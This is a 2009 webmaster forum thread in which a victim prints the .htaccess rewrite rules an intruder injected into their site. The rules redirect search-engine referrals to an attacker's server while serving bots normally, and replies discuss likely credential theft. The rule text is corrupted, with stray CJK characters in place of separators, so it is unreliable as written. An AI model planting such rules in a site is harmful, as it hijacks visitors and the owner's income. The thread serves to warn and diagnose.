Welcome to WebmasterWorld Guest from

Forum Moderators: phranque

Message Too Old, No Replies

.htaccess Hijacking Search Engine Traffic

.htaccess hacked



6:39 pm on Feb 12, 2009 (gmt 0)

5+ Year Member

If you suddenly find your traffic dropping over 90% and upon investigating find out that

- Your site loads fine
- Your DNS / host is fine
- Your rankings haven't changed
- All your search engine traffic is gone and remaining traffic is mostly direct visitors or referals from a non-search engine site?

Well that's what happened to me.

Upon investigating, I found out the following was added to my .htaccess file:

RewriteCond %{HTTP_REFERER} ^.*(google\.妃sn\.奸ive\.com尖ahoo\.地ltavista\.地ol\.地sk\.圯ureka\.com奸ycos\.com多otbot\.com夷nfoseek\.com安ebcrawler\.圯xcite\.好etscape\.com妃amma\.com地lltheweb\.com好orthernlight\.com字ambler\.ru地port\.ru尖andex\.ru如ingwin\.ru安ww\.ru如unto\.ru存earch\.comcast\.net地bcsok\.no妃yspace\.com奸ooksmart\.com).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]

RewriteCond %{HTTP_USER_AGENT} ^.*(bot守rp妃sn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://<ip removed>

My .htaccess file is not chmodded 777 or anything crazy nor are any other files/folders on my ftp.
I also don't use any open source software (e.g. wordpress, vbulletin, etc.)

I have no clue why this happened to me. I googled the ip address and only found 1 other site that this happened to.

I hope this doesn't happen to you but if it did and you googled the ip I hope you find this thread so you can resolve the issue quickly.

It took me 3 days to figure this out and I lost a lot of traffic and consequently income from this little hijack.

I have asked my host to scan the server for rootkits and I changed my ftp password.

I am still seeking an explanation for how this code ended up in my .htaccess though so any information that may lead to that answer is greatly appreciated.

[edited by: physics at 9:21 pm (utc) on Feb. 12, 2009]

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] IP address removed. No specifics please. [/edit]


8:46 pm on Feb 12, 2009 (gmt 0)

WebmasterWorld Senior Member jdmorgan is a WebmasterWorld Top Contributor of All Time 10+ Year Member

We had a thread here recently where a victim of a similar exploit found malware on his own PC that may have allowed his server login info to be captured from his PC and reported to persons unknown. He had found code very similar to what you posted above in his .htaccess file.

The code on his site shared some similarity to what you posted here, in that it was poorly-coded, and probably didn't work quite as intended.



9:33 pm on Feb 12, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member

josjongejan, what OS is your site running on?
Are you using cpanel?
As jdMorgan mentioned maybe the exploit came from your PC. Did you try running a full virus scan?


4:43 am on Feb 13, 2009 (gmt 0)

5+ Year Member

It's a cPanel server from [snip] not sure on the platform but I'm guessing it's either Linux or FreeBSD

Just did a full scan with McAfee latest definitions too, nothing found.

In my 12 years online I've never been infected by a virus, I'm pretty careful/aware

Thanks for the replies so far, I appreciate your time and effort

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]


Featured Threads

Hot Threads This Week

Hot Threads This Month